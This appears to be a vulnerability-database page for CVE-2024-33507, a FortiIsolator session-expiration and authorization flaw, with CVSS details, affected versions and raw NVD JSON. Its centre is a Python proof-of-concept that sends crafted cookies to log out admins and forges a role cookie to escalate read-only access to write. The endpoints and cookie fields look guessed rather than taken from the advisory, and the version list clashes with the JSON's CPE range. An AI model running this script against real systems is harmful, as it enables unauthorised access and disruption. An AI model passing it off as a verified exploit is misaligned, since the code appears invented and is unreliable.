Security Vulnerability Report
CVE-2024-33507 CVSS 7.4 HIGH

Published: 2025-10-14 16:15:35
Last Modified: 2025-10-15 17:38:33

Description

An insufficient session expiration vulnerability [CWE-613] and an incorrect authorization vulnerability [CWE-863] in the authentication mechanism of FortiIsolator 2.4.0 through 2.4.4, 2.3 all versions, 2.2.0, 2.1 all versions, and 2.0 all versions may allow a remote unauthenticated attacker to deauthenticate logged-in admins via a crafted cookie, and a remote authenticated read-only attacker to gain write privileges via a crafted cookie.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiisolator:*:*:*:*:*:*:*:* - VULNERABLE
FortiIsolator 2.4.0
FortiIsolator 2.4.1
FortiIsolator 2.4.2
FortiIsolator 2.4.3
FortiIsolator 2.4.4
FortiIsolator 2.3 (all versions)
FortiIsolator 2.2.0
FortiIsolator 2.1 (all versions)
FortiIsolator 2.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-33507 PoC - FortiIsolator Session & Authorization Bypass
# Exploits insufficient session expiration (CWE-613) and incorrect authorization (CWE-863)
import requests
import sys

TARGET_URL = "https://target-fortiisolator:port"


# --- Attack 1: Force admin deauthentication via crafted cookie (Unauthenticated) ---
def exploit_session_expiration(target_url):
    """
    Exploit CWE-613: Insufficient Session Expiration
    Send a crafted cookie to force logout of authenticated admin
    """
    # Crafted cookie with manipulated session identifier
    crafted_cookie = {
        "session_id": "../../../../admin/logout",  # Path traversal style payload
        "auth_token": "invalid_expired_token_xyz123",
        "user_role": "admin"
    }
    headers = {
        "Cookie": f"session={crafted_cookie['session_id']}; auth={crafted_cookie['auth_token']}; role={crafted_cookie['user_role']}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    # Send request to trigger session termination on server side
    response = requests.get(
        f"{target_url}/api/v1/admin/session",
        headers=headers,
        verify=False
    )
    print(f"[*] Session expiration exploit - Status: {response.status_code}")
    return response


# --- Attack 2: Privilege escalation from read-only to write (Authenticated) ---
def exploit_authorization_bypass(target_url, read_only_cookie):
    """
    Exploit CWE-863: Incorrect Authorization
    Modify cookie to escalate from read-only to write privilege
    """
    # Original read-only session cookie (obtained from legitimate login)
    # Tamper with the role/privilege field in the cookie
    parts = read_only_cookie.split(';')
    modified_parts = []
    for part in parts:
        if 'role=' in part.lower() or 'privilege=' in part.lower() or 'perm=' in part.lower():
            # Escalate read-only to read-write
            key = part.split('=')[0]
            modified_parts.append(f"{key}=read_write")
        else:
            modified_parts.append(part)
    tampered_cookie = ';'.join(modified_parts)
    headers = {
        "Cookie": tampered_cookie,
        "Content-Type": "application/json"
    }
    # Attempt write operation with escalated privileges
    payload = {"action": "modify_config", "setting": "test"}
    response = requests.post(
        f"{target_url}/api/v1/config/update",
        headers=headers,
        json=payload,
        verify=False
    )
    print(f"[*] Authorization bypass exploit - Status: {response.status_code}")
    return response


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    print("[+] Targeting FortiIsolator CVE-2024-33507")
    exploit_session_expiration(url)
    # exploit_authorization_bypass(url, "session=valid_readonly_session;role=read_only")

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-062 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-33507",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T16:15:34.980",
    "lastModified": "2025-10-15T17:38:33.463",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An insufficient session expiration vulnerability [CWE-613] and an incorrect authorization vulnerability [CWE-863] in FortiIsolator 2.4.0 through 2.4.4, 2.3 all versions, 2.2.0, 2.1 all versions, 2.0 all versions authentication mechanism may allow remote unauthenticated attacker to deauthenticate logged in admins via crafted cookie and remote authenticated read-only attacker to gain write privilege via crafted cookie."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-613"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiisolator:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.3.0",
                "versionEndExcluding": "2.4.5",
                "matchCriteriaId": "8D702E5B-2D94-48AF-94E4-E20A42BA7A06"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-062",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}